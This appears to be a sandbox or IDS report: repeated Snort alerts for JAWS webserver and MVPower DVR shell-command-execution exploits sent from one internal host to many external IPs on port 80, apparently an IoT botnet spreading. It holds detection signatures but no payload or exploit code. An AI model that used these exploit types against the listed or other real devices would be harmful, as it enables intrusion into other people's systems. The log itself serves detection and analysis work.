              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56362 -> 44.214.37.113:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45146 -> 98.220.77.102:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54366 -> 48.52.58.128:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44808 -> 188.248.176.49:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43374 -> 112.217.71.237:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47738 -> 31.117.7.12:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36442 -> 77.156.147.3:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44764 -> 5.69.223.73:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38426 -> 25.119.127.189:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:34360 -> 92.228.245.159:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:56234 -> 95.239.226.123:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:51050 -> 108.85.135.218:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:40992 -> 52.206.114.48:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60104 -> 58.199.54.70:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:50078 -> 129.193.114.98:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:44778 -> 25.87.20.30:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:54416 -> 146.97.242.87:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:54180 -> 222.84.171.34:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:36546 -> 196.44.130.154:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:38194 -> 48.234.108.156:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:32914 -> 45.238.94.61:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55394 -> 12.95.201.102:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:51500 -> 187.75.110.93:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33834 -> 106.16.15.220:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:47714 -> 204.135.242.117:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:39420 -> 31.70.83.31:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:37886 -> 154.1.74.103:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:34922 -> 158.4.130.100:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33706 -> 187.205.139.84:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:49442 -> 124.60.75.137:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:34260 -> 105.120.208.242:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:37714 -> 206.121.1.240:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:50218 -> 159.209.163.86:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:54536 -> 197.114.181.205:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:40758 -> 136.107.130.201:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:50846 -> 50.8.69.255:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:56784 -> 162.133.179.162:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33210 -> 155.78.6.227:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:40970 -> 113.32.208.233:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:39732 -> 128.151.195.102:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33878 -> 112.152.48.8:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:53558 -> 81.48.62.152:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:46490 -> 93.152.148.219:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:45540 -> 144.192.66.230:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55216 -> 51.180.72.227:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:52008 -> 198.24.255.213:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:42950 -> 160.171.210.51:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:42926 -> 173.201.55.115:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:32800 -> 118.131.29.171:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:38354 -> 8.194.32.207:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:42066 -> 198.139.79.120:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:48762 -> 191.185.132.251:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:58476 -> 223.81.79.132:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:54708 -> 173.142.129.181:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:58654 -> 89.243.242.221:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:45266 -> 50.235.115.106:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:52886 -> 80.252.121.45:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:40554 -> 60.55.180.73:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:40300 -> 81.78.87.67:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:34492 -> 123.28.179.254:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:50824 -> 87.130.72.182:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:57298 -> 24.4.140.180:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:57174 -> 37.47.52.166:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:43646 -> 121.59.20.215:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:47804 -> 161.166.48.249:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60716 -> 18.69.98.66:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:40782 -> 170.90.134.85:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:56362 -> 44.214.37.113:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:45146 -> 98.220.77.102:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:54366 -> 48.52.58.128:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:44808 -> 188.248.176.49:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:43374 -> 112.217.71.237:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:47738 -> 31.117.7.12:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:36442 -> 77.156.147.3:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:44764 -> 5.69.223.73:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:38426 -> 25.119.127.189:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58314 -> 65.91.194.133:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44574 -> 168.235.31.17:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37034 -> 194.244.242.70:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54410 -> 147.89.17.146:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60472 -> 49.81.200.207:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36480 -> 137.234.162.150:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58546 -> 57.54.162.72:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41606 -> 24.179.173.118:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47054 -> 213.99.204.125:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55740 -> 50.27.20.241:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55982 -> 124.0.139.31:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60810 -> 99.170.206.200:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49524 -> 133.130.243.96:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46164 -> 81.66.87.121:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46754 -> 52.191.152.237:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36208 -> 147.135.44.218:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58026 -> 59.172.71.185:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43196 -> 60.224.142.1:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:32936 -> 189.82.218.132:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53032 -> 53.223.178.64:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59368 -> 45.9.82.52:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39940 -> 69.42.202.171:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35140 -> 24.72.9.82:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56774 -> 145.92.78.73:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:40456 -> 132.66.64.38:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33194 -> 222.37.4.5:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37350 -> 66.47.79.133:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33318 -> 67.147.165.34:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53466 -> 95.127.175.227:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48614 -> 179.122.233.207:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44888 -> 161.43.121.185:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53154 -> 206.73.46.114:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50474 -> 39.24.219.249:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48212 -> 85.238.207.251:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44378 -> 32.62.55.43:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47694 -> 134.80.188.68:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45190 -> 42.11.130.136:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41362 -> 41.189.31.68:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50710 -> 198.203.182.175:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48026 -> 124.204.6.25:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45958 -> 146.155.139.101:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54808 -> 118.249.69.78:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52274 -> 106.72.36.51:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49570 -> 42.187.49.118:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49860 -> 145.13.166.240:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50036 -> 99.223.38.236:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43072 -> 107.118.12.96:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38226 -> 156.33.185.72:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35692 -> 211.152.213.185:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55520 -> 118.167.64.175:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44968 -> 176.78.160.138:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33688 -> 41.108.232.85:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38306 -> 87.233.87.119:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42682 -> 13.15.216.154:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53534 -> 219.191.228.10:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50940 -> 76.115.82.134:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44588 -> 176.104.168.239:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49912 -> 116.128.48.224:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59202 -> 104.134.7.68:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35516 -> 209.98.115.136:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35078 -> 157.151.151.63:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41746 -> 80.152.111.154:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41472 -> 213.46.243.209:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38122 -> 149.39.112.106:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39258 -> 108.12.66.222:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39030 -> 217.30.58.227:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:32974 -> 190.157.211.94:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43640 -> 123.15.159.153:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37588 -> 212.34.153.120:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52486 -> 173.159.67.38:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:44574 -> 168.235.31.17:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:37034 -> 194.244.242.70:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:54410 -> 147.89.17.146:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60472 -> 49.81.200.207:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:36480 -> 137.234.162.150:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:58546 -> 57.54.162.72:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:41606 -> 24.179.173.118:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:47054 -> 213.99.204.125:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55740 -> 50.27.20.241:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55982 -> 124.0.139.31:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60810 -> 99.170.206.200:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:49524 -> 133.130.243.96:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:46164 -> 81.66.87.121:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:46754 -> 52.191.152.237:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:36208 -> 147.135.44.218:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:58026 -> 59.172.71.185:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:43196 -> 60.224.142.1:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:32936 -> 189.82.218.132:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:53032 -> 53.223.178.64:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:59368 -> 45.9.82.52:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:39940 -> 69.42.202.171:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:35140 -> 24.72.9.82:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:56774 -> 145.92.78.73:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:40456 -> 132.66.64.38:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33194 -> 222.37.4.5:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:37350 -> 66.47.79.133:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33318 -> 67.147.165.34:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:53466 -> 95.127.175.227:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:48614 -> 179.122.233.207:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:44888 -> 161.43.121.185:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:53154 -> 206.73.46.114:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:50474 -> 39.24.219.249:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:48212 -> 85.238.207.251:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:44378 -> 32.62.55.43:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:47694 -> 134.80.188.68:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:45190 -> 42.11.130.136:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:41362 -> 41.189.31.68:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:50710 -> 198.203.182.175:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:48026 -> 124.204.6.25:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:45958 -> 146.155.139.101:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:54808 -> 118.249.69.78:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:52274 -> 106.72.36.51:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:49860 -> 145.13.166.240:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:50036 -> 99.223.38.236:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:43072 -> 107.118.12.96:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:38226 -> 156.33.185.72:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:35692 -> 211.152.213.185:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55520 -> 118.167.64.175:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:44968 -> 176.78.160.138:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33688 -> 41.108.232.85:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:38306 -> 87.233.87.119:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:42682 -> 13.15.216.154:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:53534 -> 219.191.228.10:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:50940 -> 76.115.82.134:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:44588 -> 176.104.168.239:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:49912 -> 116.128.48.224:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:59202 -> 104.134.7.68:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:35516 -> 209.98.115.136:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:35078 -> 157.151.151.63:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:41746 -> 80.152.111.154:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:41472 -> 213.46.243.209:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:38122 -> 149.39.112.106:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:39258 -> 108.12.66.222:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:39030 -> 217.30.58.227:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:32974 -> 190.157.211.94:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:43640 -> 123.15.159.153:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:37588 -> 212.34.153.120:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:52486 -> 173.159.67.38:80
